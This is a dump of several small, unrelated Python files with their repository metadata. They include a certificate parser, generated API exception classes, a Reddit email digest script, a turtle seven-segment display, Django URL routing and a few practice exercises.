b0e91394bff1be5dfe354c640ced42e3fac6041c | e46c52607c763675e00182c5bdd3bb61ce0c6f48 | /lib/core/cert.py | b493f50f3bce4da1b182a21e7d05e5fae694e18c | [] | no_license | atlassion/PacketSenderLite | a610833380b19c59b3ae3a7de49fbd03fffffa28 | 3ff9db1e791deedfb2d7c638f94cd9cb5daa4a63 | refs/heads/master | 2023-06-09T15:03:28.278597 | 2021-06-22T11:49:08 | 2021-06-22T11:49:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,659 | py | from hashlib import sha256, sha1, md5
from typing import List
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import Certificate
__all__ = ['convert_bytes_to_cert', 'get_certificate_domains']
# noinspection PyUnresolvedReferences,PyProtectedMember,PyBroadException
def convert_bytes_to_cert(bytes_cert: bytes) -> dict:
    """Parse a DER- or PEM-encoded X.509 certificate into a flat dict.

    Tries DER first, then PEM.  On success returns a dict with the
    validity window, issuer/subject attributes, version, several serial
    number representations, SAN names and md5/sha1/sha256 fingerprints
    of the raw input bytes.  Implicitly returns None when the bytes
    cannot be parsed as a certificate.
    """
    cert = None
    # Try DER first, fall back to PEM; BaseException so that any backend
    # parser failure is swallowed and cert simply stays None.
    try:
        cert = x509.load_der_x509_certificate(bytes_cert, default_backend())
    except BaseException:
        try:
            cert = x509.load_pem_x509_certificate(bytes_cert, default_backend())
        except BaseException:
            pass
    if cert:
        result = {}
        serial_number = cert.serial_number
        issuer = cert.issuer
        try:
            # Validity window, as datetime objects and ISO-8601-style strings.
            result['validity'] = {}
            result['validity']['end_datetime'] = cert.not_valid_after
            result['validity']['start_datetime'] = cert.not_valid_before
            result['validity']['end'] = result['validity']['end_datetime'].strftime('%Y-%m-%dT%H:%M:%SZ')
            result['validity']['start'] = result['validity']['start_datetime'].strftime('%Y-%m-%dT%H:%M:%SZ')
        except Exception:
            pass
        result['issuer'] = {}
        # Map cryptography's OID display names onto the output key names.
        dict_replace = {
            'countryName': 'country',
            'organizationName': 'organization',
            'commonName': 'common_name'
        }
        try:
            # Walks issuer RDNs via private attributes (fragile across
            # cryptography versions, hence the broad except).
            for n in issuer.rdns:
                z = n._attributes[0]
                name_k = z.oid._name
                value = z.value
                if name_k in dict_replace:
                    result['issuer'][dict_replace[name_k]] = [value]
        except Exception:
            pass
        try:
            # version.name is e.g. 'v3' -> report '3'.
            if 'v' in cert.version.name:
                result['version'] = cert.version.name.split('v')[1].strip()
        except BaseException:
            result['version'] = str(cert.version.value)
        dnss = get_certificate_domains(cert)
        atr = cert.subject._attributes
        result['subject'] = {}
        for i in atr:
            for q in i._attributes:
                result['subject'][q.oid._name] = [q.value]
        # NOTE(review): subject attributes are stored under result['subject'],
        # so this top-level 'serialNumber' check appears never to be true;
        # the KeyError in the try below is then swallowed and
        # serialNumber_int stays 0.  Confirm whether
        # result['subject']['serialNumber'] was intended here.
        if 'serialNumber' in list(result.keys()):
            if len(result['serialNumber']) == 16:
                result['serialNumber'] = '00' + result['serialNumber']
        try:
            result['serialNumber_int'] = int('0x' + result['serialNumber'], 16)
            result['serial_number'] = str(result['serialNumber_int'])
        except BaseException:
            result['serialNumber_int'] = 0
        result['names'] = dnss
        if result['serialNumber_int'] == 0:
            result['serial_number'] = str(serial_number)
        result['serial_number_hex'] = str(hex(serial_number))
        result['raw_serial'] = str(serial_number)
        # Fingerprints are computed over the raw input bytes, not a
        # re-encoded form of the certificate.
        hashs = {
            'fingerprint_sha256': sha256,
            'fingerprint_sha1': sha1,
            'fingerprint_md5': md5
        }
        for namehash, func in hashs.items():
            hm = func()
            hm.update(bytes_cert)
            result[namehash] = hm.hexdigest()
        # serialNumber_int was only an intermediate value.
        remove_keys = ['serialNumber_int']
        for key in remove_keys:
            result.pop(key)
        return result
# noinspection PyBroadException
def get_certificate_domains(cert: Certificate) -> List[str]:
    """
    Gets a list of all Subject Alternative Names in the specified certificate.

    Returns an empty list when the certificate has no SubjectAlternativeName
    extension, or when reading the extensions fails.
    """
    try:
        for ext in cert.extensions:
            ext = ext.value
            if isinstance(ext, x509.SubjectAlternativeName):
                return ext.get_values_for_type(x509.DNSName)
    except BaseException:
        return []
    # Bug fix: previously fell through and implicitly returned None when no
    # SAN extension was present, violating the declared List[str] return type.
    return []
| [
"shadow.bfs@gmail.com"
] | shadow.bfs@gmail.com |
3d07439a0606060f4f49825121ce14c2c92590b0 | e6c506beafef296be2f60c3809b36c96c7374224 | /左旋转字符串.py | 87a697603b995532a2bcc0e42f07e4a2dc49236e | [] | no_license | Liubasara/pratice_code | d435c982379e377e3cb657d77e207f4f51f5e3b5 | 353363780b0918802e9457aee8ec2a8acc0c24fb | refs/heads/master | 2023-08-18T01:29:00.676510 | 2023-08-10T11:09:11 | 2023-08-10T11:09:11 | 137,707,904 | 0 | 0 | null | 2023-01-08T07:34:21 | 2018-06-18T03:54:33 | JavaScript | UTF-8 | Python | false | false | 72 | py |
def left_rotate(seq, k=1):
    """Return ``seq`` rotated left by ``k`` positions (works for any slicable sequence)."""
    return seq[k:] + seq[:k]


if __name__ == "__main__":
    # Demo: rotate a sample list left by one position.
    # Bug fix: the original used the Python-2-only `print` statement; this
    # version is Python 3 compatible and prints the identical list repr.
    a = [1, 2, 3, 4, 5, 6]
    print(left_rotate(a, 1))
"followsin@gami.com"
] | followsin@gami.com |
fefa024de214cfeafa5d85b6923b4b92572e46fb | 583c92b827d741f2385560a75de6d125d888be1b | /classics_proxy_client/exceptions.py | 210bd4cd7815f0f358d47f53315b996b6d4cc04d | [] | no_license | kyunghyuncho/classics-proxy-client | 9686e72aae830bfe8072648505419ddc5c18df5a | 5bfaf30106ba5456a5c2787f0cf8a1cacff10a00 | refs/heads/master | 2022-07-01T05:08:22.608264 | 2020-05-11T04:30:45 | 2020-05-11T04:30:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,761 | py | # coding: utf-8
"""
Classics Proxy API
Proxy API for fetching Classic Sino-Korean Literature from various corpora # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import six
class OpenApiException(Exception):
    """Common base class for every exception raised by this client."""
class ApiTypeError(OpenApiException, TypeError):
    """Signals that a received value (or dict key) has the wrong type."""

    def __init__(self, msg, path_to_item=None, valid_classes=None,
                 key_type=None):
        """Record the type-error context and build the final message.

        Args:
            msg (str): the exception message

        Keyword Args:
            path_to_item (list): keys and indices leading to the offending
                item; None if unset
            valid_classes (tuple): the primitive classes the item should be
                an instance of; None if unset
            key_type (bool): True when the offending item is a dict key,
                False when it is a dict value or list item; None if unset
        """
        self.path_to_item = path_to_item
        self.valid_classes = valid_classes
        self.key_type = key_type
        full_msg = (
            "{0} at {1}".format(msg, render_path(path_to_item))
            if path_to_item
            else msg
        )
        super(ApiTypeError, self).__init__(full_msg)
class ApiValueError(OpenApiException, ValueError):
    """Signals that a received value is invalid."""

    def __init__(self, msg, path_to_item=None):
        """Store the data path (if any) and format the message.

        Args:
            msg (str): the exception message

        Keyword Args:
            path_to_item (list): the path to the invalid entry in the
                received data; None if unset
        """
        self.path_to_item = path_to_item
        if path_to_item:
            msg = "{0} at {1}".format(msg, render_path(path_to_item))
        super(ApiValueError, self).__init__(msg)
class ApiKeyError(OpenApiException, KeyError):
    """Signals that an expected key is missing from the received data."""

    def __init__(self, msg, path_to_item=None):
        """Store the data path (if any) and format the message.

        Args:
            msg (str): the exception message

        Keyword Args:
            path_to_item (None/list): the path to the failing key in the
                received_data dict
        """
        self.path_to_item = path_to_item
        if path_to_item:
            msg = "{0} at {1}".format(msg, render_path(path_to_item))
        super(ApiKeyError, self).__init__(msg)
class ApiException(OpenApiException):
    """Wraps a failed HTTP response from the API server."""

    def __init__(self, status=None, reason=None, http_resp=None):
        """Capture status/reason/body/headers, preferring a live response object."""
        if http_resp:
            self.status = http_resp.status
            self.reason = http_resp.reason
            self.body = http_resp.data
            self.headers = http_resp.getheaders()
        else:
            self.status = status
            self.reason = reason
            self.body = None
            self.headers = None

    def __str__(self):
        """Render status and reason, plus headers and body when present."""
        pieces = [
            "({0})\n".format(self.status),
            "Reason: {0}\n".format(self.reason),
        ]
        if self.headers:
            pieces.append("HTTP response headers: {0}\n".format(self.headers))
        if self.body:
            pieces.append("HTTP response body: {0}\n".format(self.body))
        return "".join(pieces)
def render_path(path_to_item):
    """Returns a string representation of a path, e.g. [0]['name']."""
    return "".join(
        "[{0}]".format(pth) if isinstance(pth, six.integer_types)
        else "['{0}']".format(pth)
        for pth in path_to_item
    )
| [
"iyi@snapchat.com"
] | iyi@snapchat.com |
cafc4911927a1bc3db70b0421caa2bd1947264dc | 5928d9dcf1ff48f5c9d1a491fd170886d4af4b9e | /walltime1s/time_diff.py | 2d35bd10713fac06055fb9354a1c9da5a913e757 | [] | no_license | xyongcn/qemu-tprof | 1ad76dd166eea692487153359c1d61a237eeb42c | 7c30f139e2d662d2bbc6d3a0925053b194f4e3bc | refs/heads/master | 2016-09-05T21:15:59.188610 | 2014-12-15T07:58:06 | 2014-12-15T07:58:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | #!/usr/bin/python
import sys
# Timestamp log lines are read from standard input (see loop below).
log=sys.stdin
def get_tusec(p_line):
	"""Convert a log line like 'label: SEC, USEC' to total microseconds.

	Bug fix: the original body read the global variable ``line`` instead of
	the ``p_line`` parameter, and worked only by accident because every
	caller happened to pass that same global.
	"""
	words=p_line.split(":")
	words2=words[1].split(",")
	sec=words2[0].strip()
	usec=words2[1].strip()
	tusec=int(sec)*1000000+int(usec)
	return tusec
# Python 2 script: for each consecutive pair of timestamp lines on stdin,
# print the drift from an expected 1-second interval, in milliseconds.
line=log.readline()
t1=get_tusec(line)
while True:
	line=log.readline()
	if not line : break
	t2=get_tusec(line)
	#print str(t2)+","+str(t1)+","+str(t2-t1)
	# (t2 - t1) minus one second, converted from microseconds to ms.
	print (t2-t1-1000000)/1000.0
	t1=t2
| [
"myming@ubuntu-xyong.(none)"
] | myming@ubuntu-xyong.(none) |
cc4ca8bee5f7c9548c5afea6850d0cc031ab24e8 | 4cd5d0ed28ae52277ba904ea70eb9ac234eced0c | /RedditDigest.py | 7072fd945ea5716f6272005fe9da061b6df0fb76 | [] | no_license | LiamHz/AutoPy | b30f672c69fb96e501d3434b28f6dd224546c39f | 9be71fea5e33a8cb715d407d91ea1eced177eca0 | refs/heads/master | 2021-07-08T12:47:02.485285 | 2019-03-06T16:47:37 | 2019-03-06T16:47:37 | 142,188,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | # Send the top posts of the past day from selected subreddits
import praw
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Read user credentials from external file
f = open("AuthenticationCredentials.txt","r")
lines = f.read().splitlines()
EMAIL_USERNAME = lines[1]
EMAIL_PASSWORD = lines[2]
REDDIT_USERNAME = lines[5]
REDDIT_PASSWORD = lines[6]
API_USERNAME = lines[9]
API_PASSWORD = lines[10]
f.close()
submissions = []
reddit = praw.Reddit(client_id=API_USERNAME,
client_secret=API_PASSWORD,
password=REDDIT_PASSWORD,
username=REDDIT_USERNAME,
user_agent='RedditDigest')
# How many posts to send from each subreddit
subredditLimit = 2
# Selected subreddits
subreddits = ['MachineLearning', 'WorldNews', 'Technology', 'Science', 'TodayILearned']
# 'Pics', 'MostBeautiful', 'EarthPorn']
for SR in subreddits:
count = 1
subreddit = reddit.subreddit(SR)
submissions.append(("<h2>{}</h2> \n").format(SR))
for submission in subreddit.top(time_filter='day', limit=subredditLimit):
submissions.append("<div> \n")
submissions.append(("<a href='{}'> \n").format(submission.url))
submissions.append(("<p>{}</p> \n").format(submission.title))
submissions.append("</a> \n")
submissions.append("</div> \n")
submissions.append("<br class='mobile'> \n")
submissions.append("<br> \n")
# Email results to self
fromaddr = EMAIL_USERNAME
toaddr = EMAIL_USERNAME
# Create message container
msg = MIMEMultipart('alternative')
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Reddit Digest"
# Plain text version of email
s = ''
formatted_submissions = s.join(submissions)
# HTML version of email
html = """\
<html>
<head>
<style>
@media only screen and (min-width:800px) {{
.mobile {{display: none !important;}}
}}
</style>
</head>
<body>
{}
</body>
</html>
""".format(formatted_submissions)
# Allow Unicode characters to be emailed
plainText = MIMEText(formatted_submissions.encode('utf-8'), 'plain', 'UTF-8')
html = MIMEText(html, 'html')
msg.attach(plainText)
msg.attach(html)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, EMAIL_PASSWORD)
server.sendmail(fromaddr, toaddr, msg.as_string())
server.quit()
| [
"liam.hinzman@gmail.com"
] | liam.hinzman@gmail.com |
31affbaa13b3b6dbe80804986e0fff5b1236c8cd | 63e903bd5448de49d666d00ae1cef76ba7e41b93 | /venv/Scripts/pip3.8-script.py | 986a0efffcb314557212eb151bb063f4e90a870c | [] | no_license | North-Poplar/untitled1 | 0958c01dfa92700876fd6a97a206cbd6c52175a2 | 06b1b025a7a2f66ce1d81a9e4ec1e164259cdb3a | refs/heads/master | 2022-11-11T18:21:33.833494 | 2020-07-04T14:55:54 | 2020-07-04T14:55:54 | 277,105,098 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | #!C:\Users\18505\PycharmProjects\untitled1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"2481253805@qq.com"
] | 2481253805@qq.com |
7cc1e02baa1ff8a47e4b543d8df9d4f42f3110fc | 2ea2631c1c7fd49d5c177f4b804b8470bdd62a82 | /sievePlot.py | 707c12b294296830c2404c227e276f6c54faeee4 | [] | no_license | Shichimenchou/CS4700FinalProject | abf733e83ee248eff98bb8ca6bc1d0d6a8e772fa | b80480bae028c714b5c8f812e2aa587c3f1092e4 | refs/heads/master | 2022-04-23T20:29:59.202388 | 2020-04-28T05:34:10 | 2020-04-28T05:34:10 | 259,216,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from pylab import *
# Benchmark timings (seconds) for computing a Sieve of Eratosthenes of
# order 2^x, x in [10, 30], in three languages.
t = arange(10, 31)
cpp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 2, 4, 9, 20, 41, 83, 173]
julia = [0.000038, 0.000065, 0.00012, 0.00027, 0.00058, 0.0011, 0.0021, 0.0048, 0.0084, 0.018, 0.041, 0.094, 0.21, 0.61, 1.03, 2.05, 4.21, 9.77, 26.62, 76.77, 379.12]
python = [0.00025, 0.00058, 0.0010, 0.0021, 0.0046, 0.009, 0.018, 0.038, 0.076, 0.16, 0.35, 0.76, 1.58, 3.44, 6.90, 14.43, 29.38, 59.28, 121.00, 266.12, 559.05]
# Sanity check: each series must have the same 21 entries as t.
print(len(cpp))
print(len(julia))
print(len(python))
plot(t, cpp, label="C++")
plot(t, julia, label="Julia")
plot(t, python, label="Python")
xlabel("Order (2^x)")
ylabel("Time (s)")
title("Sieve of Eratosthenes")
grid(True)
# Fix: legend() was previously called twice (redundant); once is enough.
legend()
show()
| [
"linsonphillip@yahoo.com"
] | linsonphillip@yahoo.com |
3586db050a69dcf9aa2c251478a20d1daa1a8560 | 7eed53aaefbac57b374b31946ea2b26ff55e0e44 | /scripts/poc-7segment.py | d165774207b3d24e307b319de89e547f22bcc962 | [] | no_license | Nickardson/tracy-the-turtle-projects | 580b268a7ab3b9abc47c343a1e7cf4462ffc746b | 0545c2cd42b6a22544794b207ac2bc51475268da | refs/heads/master | 2022-12-12T07:54:19.942076 | 2020-03-06T01:01:56 | 2020-03-06T01:01:56 | 237,668,470 | 0 | 0 | null | 2022-12-11T22:53:59 | 2020-02-01T19:45:42 | Python | UTF-8 | Python | false | false | 2,182 | py | from turtle import Screen, Turtle
# Window and custom cursor setup: the 'segment' shape is a hexagonal bar
# ( <=> ) that gets stamped once per lit segment.
screen = Screen()
screen.setup(950, 200)
screen.register_shape('segment', ((-14.5, 0), (-12, 2.5), (12, 2.5), (14.5, 0), (12, -2.5), (-12, -2.5))) # <=>
SCALE = 1.75 # arbitrarily scale digits larger or smaller
CURSOR_SIZE = 25 # maximum dimension of our custom turtle cursor
SPACING = CURSOR_SIZE * 1.25 * SCALE # space from start of one digit to the next
# Bit i of each value selects segments[i] (see the dispatch list below):
# bit 6 = top, 5..1 = the four diagonals + sides, 0 = center bar.
DIGITS = { # which segments to turn on encoded as bits
    '0': 0b1111110,
    '1': 0b0110000,
    '2': 0b1101101,
    '3': 0b1111001,
    '4': 0b0110011,
    '5': 0b1011011,
    '6': 0b1011111,
    '7': 0b1110000,
    '8': 0b1111111,
    '9': 0b1111011,
    'A': 0b1110111,
    'B': 0b0011111,
    'C': 0b1001110,
    'D': 0b0111101,
    'E': 0b1001111,
    'F': 0b1000111,
}
def display_number(turtle, number):
    """Stamp each character of ``number`` as a seven-segment digit,
    advancing the turtle by SPACING after every digit."""
    for character in str(number):
        encoding = DIGITS[character]
        for index in range(7):
            if encoding & (1 << index):
                # Remember where this digit starts, place and stamp the
                # segment, then restore position and heading.
                start = turtle.position()
                segments[index](turtle)
                turtle.stamp()
                turtle.setheading(0)
                turtle.setposition(start)
        turtle.forward(SPACING)
def segment_A(turtle): # top
    """Place the cursor for the top horizontal bar."""
    rise = SCALE * 20
    turtle.setheading(90)
    turtle.sety(turtle.ycor() + rise)
def segment_B(turtle): # right upper
    """Place the cursor for the upper-right segment position."""
    step = SCALE * 10
    turtle.setposition(turtle.xcor() + step, turtle.ycor() + step)
def segment_C(turtle): # right lower
    """Place the cursor for the lower-right segment position."""
    step = SCALE * 10
    turtle.setposition(turtle.xcor() + step, turtle.ycor() - step)
def segment_D(turtle): # bottom
    """Place the cursor for the bottom horizontal bar."""
    drop = SCALE * 20
    turtle.setheading(90)
    turtle.sety(turtle.ycor() - drop)
def segment_E(turtle): # left lower
    """Place the cursor for the lower-left segment position."""
    step = SCALE * 10
    turtle.setposition(turtle.xcor() - step, turtle.ycor() - step)
def segment_F(turtle): # left upper
    """Place the cursor for the upper-left segment position."""
    step = SCALE * 10
    turtle.setposition(turtle.xcor() - step, turtle.ycor() + step)
def segment_G(turtle): # center
    # Middle bar: only the orientation changes; the cursor is already
    # at the digit's center.
    turtle.setheading(90)
# Segment dispatch table: index i corresponds to bit 2**i in DIGITS.
segments = [segment_G, segment_F, segment_E, segment_D, segment_C, segment_B, segment_A]
# Drawing turtle: invisible (False), fast, pen up -- output is stamps only.
digits = Turtle('segment', False)
digits.speed('fastest')
digits.shape('segment')
digits.penup()
# Start one digit-width in from the window's left edge.
digits.setx(SPACING - screen.window_width() / 2)
display_number(digits, "0123456789ABCDEF")
| [
"taylorgratzer@yahoo.com"
] | taylorgratzer@yahoo.com |
54efaf34fa4aca4b31c9b4fe6d36b5dd4d65d9f7 | 14e6cf117d502517805639ee5850ec4a78654765 | /backend/bestdeal/urls.py | e0372b2dacb48c1dced46fd457e18a6f81846225 | [] | no_license | viikt0r/pythonproject | cf05590b20798bbc12985f30eabf2970d262a5d1 | e7d9f49fdf206f297641fada0a861f1e307cd4b3 | refs/heads/master | 2023-01-06T00:43:27.587484 | 2019-06-05T17:16:19 | 2019-06-05T17:16:19 | 157,125,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | from os import listdir
from os.path import join, isdir
from django.urls import path, include
from pythonproject.settings import BASE_DIR
from rest_framework_swagger.views import get_swagger_view
schema_view = get_swagger_view(title='Bestdeal API')
API_DIR = 'bestdeal/api/'
entities = [directory
for directory in listdir(join(BASE_DIR, API_DIR))
if (isdir(join(BASE_DIR, API_DIR, directory))
and directory != '__pycache__')]
urlpatterns = [
path('', include('bestdeal.api.{}.urls'.format(entity)))
for entity in entities
]
urlpatterns += [
path('docs/', schema_view),
] | [
"esteve.viktor@gmail.com"
] | esteve.viktor@gmail.com |
2c535cfcb097e6b1a7f0880f3a022b2d331efe16 | b6c6d71b2c0c00540a6387ddd1e27db096d2f442 | /AIlab/certainty_facor.py | 85096f6a6ca860f1b181765f697481ee593bca29 | [] | no_license | raghavdasila/General-programs | 26bb5daddd054f8e6d56924ecb87884e687c8a53 | a9f2899ad2b048291793bbdf3dac808b571f9f13 | refs/heads/master | 2021-07-07T05:30:52.374798 | 2017-10-05T04:40:17 | 2017-10-05T04:40:17 | 104,132,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | if __name__=="__main__":
print "Medicine Accuracy Testing (Enter percentages)"
print "Enter sensitivity"
se=float(raw_input())/100.0
print "Enter Specificity"
sp=float(raw_input())/100.0
print "Enter percentage of users"
up=float(raw_input())/100.0
print "Enter population"
p=float(raw_input())
pv=(se*up)/(se*up+(1.0-up)*(1.0-se))
nv=(sp*up)/(sp*up+(1.0-up)*(1.0-sp))
n_users=up*p
users=p-n_users
cf1=int(pv*p)
cf2=int(nv*p)
print "Positive's certainty factor, people:",pv,cf1
print "Negative's certainty factor, people:",nv,cf2
print "Medicine suitable for people?"
if pv<.7 or nv<.7:print "NO"
else:print "YES"
| [
"noreply@github.com"
] | noreply@github.com |
a5b48a72bcda4d1aa680865c3ef883043afe3f26 | ff01890e8c6090cd7519da93a96d96a11235ec94 | /utils/flow_resolver/protocol.py | 74c97372118610e128a1103c7b503297c8b19ec5 | [
"Apache-2.0"
] | permissive | DeckerCHAN/shadowsocks | 707fbd19448919462bf9249c0e8feb557b9db1dc | 29afedb748b0ca2051def24b3bed430f522b4adf | refs/heads/master | 2021-01-15T21:30:02.355942 | 2015-05-09T05:09:49 | 2015-05-09T05:09:49 | 32,707,288 | 0 | 0 | null | 2015-03-23T02:38:19 | 2015-03-23T02:38:19 | null | UTF-8 | Python | false | false | 100 | py | __author__ = 'Decker'
class ProtocolType:
TCP = 1,
UDP = 2,
HTTP = 3,
UNKNOWN = -1 | [
"DeckerCHAN@gmail.com"
] | DeckerCHAN@gmail.com |
92e7d30756b64afbf77cb481a3bf486bdcc1f546 | c02f0785a36f970e72239acb73a8ed14e580d2c9 | /interview/interview_preparation_kit/warmup/challenges/sock_merchant/sock_merchant.py | df985956bfa5a017e5801d5c4107f8a8a06efe26 | [] | no_license | Nyakama/hacker_rank | f6fca0fea20a583e6c0e4b11d3e46c0c11c7e051 | fe611c1f9bde7233d5c1e4d9b3e58594193434ea | refs/heads/master | 2022-12-13T09:17:24.093312 | 2020-08-29T00:03:57 | 2020-08-29T00:03:57 | 290,355,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | #!/bin/python3
import math
import os
import random
import re
import sys
from collections import Counter
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
sum=0
for val in Counter(ar).values():
sum+=val//2
return sum
# HackerRank harness: read n and the sock colors from stdin, write the
# pair count to the file named by the OUTPUT_PATH environment variable.
if __name__ == '__main__':
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    n = int(input())
    ar = list(map(int, input().rstrip().split()))
    result = sockMerchant(n, ar)
    fptr.write(str(result) + '\n')
    fptr.close()
| [
"lungile.nyakama@gmail.com"
] | lungile.nyakama@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.